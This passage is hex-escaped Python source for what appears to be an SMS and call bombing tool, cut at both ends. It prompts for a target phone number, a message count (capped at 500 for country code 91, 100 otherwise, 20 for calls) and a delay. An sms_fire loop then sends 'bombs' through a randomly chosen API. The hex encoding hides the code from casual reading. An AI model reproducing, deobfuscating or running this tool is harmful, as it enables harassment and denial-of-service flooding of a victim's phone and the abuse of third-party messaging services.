x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x73\x6d\x73\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6d\x73\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x0a\x64\x65\x66\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x4e\x6f\x2e\x6f\x66\x20\x43\x61\x6c\x6c\x20\x54\x6f\x20\x4d\x61\x6b\x65\x7b\x35\x7d\x28\x7b\x33\x7d\x4d\x61\x78\x69\x6d\x75\x6d\x20\x32\x30\x7b\x35\x7d\x29\x20\x20\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x51\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x69\x6e\x5f\x6d\x65\x6e\x75\x28\x29\x0a\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x66\x6c\x6f\x61\x74\x28\x69\x6e\x70\x75\x74\x28\x22\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x32\x7d\x45\x6e\x74\x65\x72\x20\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x7b\x35\x7d\x28\x7b\x30\x7d\x69\x6e\x20\x73\x65\x63\x6f\x6e\x64\x73\x7b\x35\x7d\x29\x20\x7b\x33\x7d\x5b\x7b\x32\x7d\x52\x65\x63\x6f\x6d\x6d\x65\x6e\x64\x65\x64\x20\x31\x30\x20\x73\x65\x63\x7b\x33\x7d\x5d\x7b\x30\x7d\x7b\x36\x7d\x3a\x7b\x34\x7d\x7b\x32\x7d\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x64\x6c\x20\x3c\x20\x31\x30\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x43\x61\x6e\x27\x74\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4c\x65\x73\x73\x20\x54\x68\x65\x6e\x20\x31\x30\x20\x53\x65\x63\x20\x22\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x64\x6c\x20\x3d\x20\x31\x30\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x35\x7d\x54\x41\x52\x47\x45\x54\x20\x44\x45\x54\x41\x49\x4c\x53\x7b\x30\x7d\x5d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x54\x61\x72\x67\x65\x74\x20\x4e\x75\x6d\x62\x65\x72\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x38\x7d\x3a\x7b\x34\x7d\x7b\x35\x7d\x20\x2b\x7b\x33\x7d\x7b\x36\x7d\x20\x7b\x37\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x73\x74\x72\x28\x63\x63\x29\x2c\x70\x6e\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x4e\x75\x6d\x62\x65\x72\x20\x6f\x66\x20\x4d\x65\x73\x73\x61\x67\x65\x20\x54\x6f\x20\x53\x65\x6e\x74\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x6e\x6d\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x33\x7d\x44\x65\x6c\x61\x79\x20\x54\x69\x6d\x65\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7b\x30\x7d\x7b\x37\x7d\x3a\x7b\x34\x7d\x20\x7b\x33\x7d\x7b\x36\x7d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x64\x6c\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x0a\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x22\x7b\x35\x7d\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x7b\x34\x7d\x22\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x29\x29\x0a\x20\x20\x20\x20\x69\x66\x20\x69\x6e\x70\x75\x74\x28\x27\x5c\x74\x5c\x74\x7b\x30\x7d\x5b\x7b\x32\x7d\x3e\x7b\x30\x7d\x5d\x20\x7b\x33\x7d\x50\x72\x65\x73\x73\x20\x7b\x36\x7d\x45\x6e\x74\x65\x72\x7b\x34\x7d\x20\x7b\x33\x7d\x54\x6f\x20\x43\x6f\x6e\x74\x69\x6e\x75\x65\x2e\x2e\x2e\x2e\x5c\x6e\x5c\x74\x5c\x74\x49\x66\x20\x59\x6f\x75\x20\x57\x61\x6e\x74\x20\x54\x6f\x20\x43\x68\x61\x6e\x67\x65\x20\x50\x72\x65\x73\x73\x20\x22\x7b\x36\x7d\x58\x7b\x34\x7d\x7b\x33\x7d\x22\x5c\x6e\x5c\x74\x5c\x74\x5c\x74\x5c\x74\x27\x2e\x66\x6f\x72\x6d\x61\x74\x28\x52\x45\x44\x2c\x20\x57\x48\x49\x54\x45\x2c\x20\x43\x59\x41\x4e\x2c\x20\x47\x52\x45\x45\x4e\x2c\x20\x44\x45\x46\x41\x55\x4c\x54\x20\x2c\x59\x45\x4c\x4c\x4f\x57\x2c\x62\x6c\x69\x6e\x6b\x29\x29\x2e\x75\x70\x70\x65\x72\x28\x29\x20\x3d\x3d\x20\x22\x58\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x67\x65\x74\x5f\x69\x6e\x66\x6f\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6f\x5f\x63\x61\x6c\x6c\x28\x29\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x63\x61\x6c\x6c\x5f\x73\x61\x76\x65\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x6c\x65\x65\x70\x28\x30\x2e\x33\x29\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x63\x63\x20\x3d\x3d\x20\x22\x39\x31\x22\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x35\x30\x30\x0a\x20\x20\x20\x20\x65\x6c\x73\x65\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x31\x30\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x53\x4d\x53\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x53\x4d\x53\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x0a\x64\x65\x66\x20\x63\x61\x6c\x6c\x5f\x77\x6f\x72\x6b\x28\x29\x3a\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x6e\x6d\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x63\x63\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x70\x6e\x0a\x20\x20\x20\x20\x67\x6c\x6f\x62\x61\x6c\x20\x64\x6c\x0a\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x69\x6e\x74\x28\x6e\x6d\x29\x0a\x20\x20\x20\x20\x6d\x61\x78\x6c\x69\x6d\x20\x3d\x20\x32\x30\x0a\x20\x20\x20\x20\x69\x66\x20\x6e\x6d\x20\x3e\x20\x6d\x61\x78\x6c\x69\x6d\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x6e\x5c\x6e\x5c\x74\x53\x6f\x72\x72\x79\x20\x44\x75\x64\x65\x20\x54\x68\x69\x73\x20\x53\x63\x72\x69\x70\x74\x20\x57\x69\x6c\x6c\x20\x4f\x66\x66\x65\x72\x65\x64\x20\x4f\x6e\x6c\x79\x27\x20\x2b\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x20\x2b\x20\x27\x20\x43\x61\x6c\x6c\x73\x20\x41\x74\x20\x4f\x6e\x63\x65\x2e\x2e\x21\x5c\x6e\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x70\x72\x69\x6e\x74\x28\x27\x5c\x74\x5c\x74\x4e\x75\x6d\x62\x65\x72\x20\x4f\x66\x20\x43\x61\x6c\x6c\x73\x20\x48\x61\x73\x20\x62\x65\x65\x6e\x20\x53\x65\x74\x20\x54\x6f\x20\x27\x20\x2b\x20\x73\x74\x72\x28\x6d\x61\x78\x6c\x69\x6d\x29\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x6e\x6d\x20\x3d\x20\x6d\x61\x78\x6c\x69\x6d\x0a\x23\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x3d\x0a\x64\x65\x66\x20\x73\x6d\x73\x5f\x66\x69\x72\x65\x28\x74\x61\x72\x67\x65\x74\x2c\x20\x63\x6f\x75\x6e\x74\x65\x72\x2c\x20\x64\x65\x6c\x61\x79\x2c\x20\x63\x68\x2c\x20\x63\x63\x29\x3a\x0a\x20\x20\x20\x20\x23\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x2b\x0a\x20\x20\x20\x20\x74\x72\x20\x3d\x20\x54\x65\x73\x74\x54\x68\x72\x65\x61\x64\x69\x6e\x67\x28\x29\x0a\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x22\x63\x6c\x65\x61\x72\x22\x29\x0a\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x66\x61\x69\x6c\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x72\x65\x71\x75\x65\x73\x74\x65\x64\x20\x3d\x20\x30\x0a\x20\x20\x20\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3d\x20\x69\x6e\x74\x28\x72\x65\x71\x75\x65\x73\x74\x65\x64\x29\x20\x2d\x20\x69\x6e\x74\x28\x66\x61\x69\x6c\x65\x64\x29\x0a\x20\x20\x20\x20\x62\x6f\x6d\x62\x73\x20\x3d\x20\x69\x6e\x74\x28\x63\x6f\x75\x6e\x74\x65\x72\x29\x20\x2b\x20\x31\x0a\x20\x20\x20\x20\x77\x68\x69\x6c\x65\x20\x73\x75\x63\x63\x65\x73\x73\x20\x3c\x20\x28\x69\x6e\x74\x28\x62\x6f\x6d\x62\x73\x29\x29\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x73\x79\x73\x74\x65\x6d\x28\x27\x63\x6c\x65\x61\x72\x27\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x62\x61\x6e\x6e\x65\x72\x28\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x74\x72\x79\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x61\x70\x69\x20\x3d\x20\x72\x61\x6e\x64\x6f\x6d\x2e\x63\x68\x6f\x69\x63\x65\x28\x63\x68\x29\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x65\x78\x63\x65\x70\x74\x20\x45\x78\x63\x65\x70\x74\x69\x6f\x6e\x3a\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\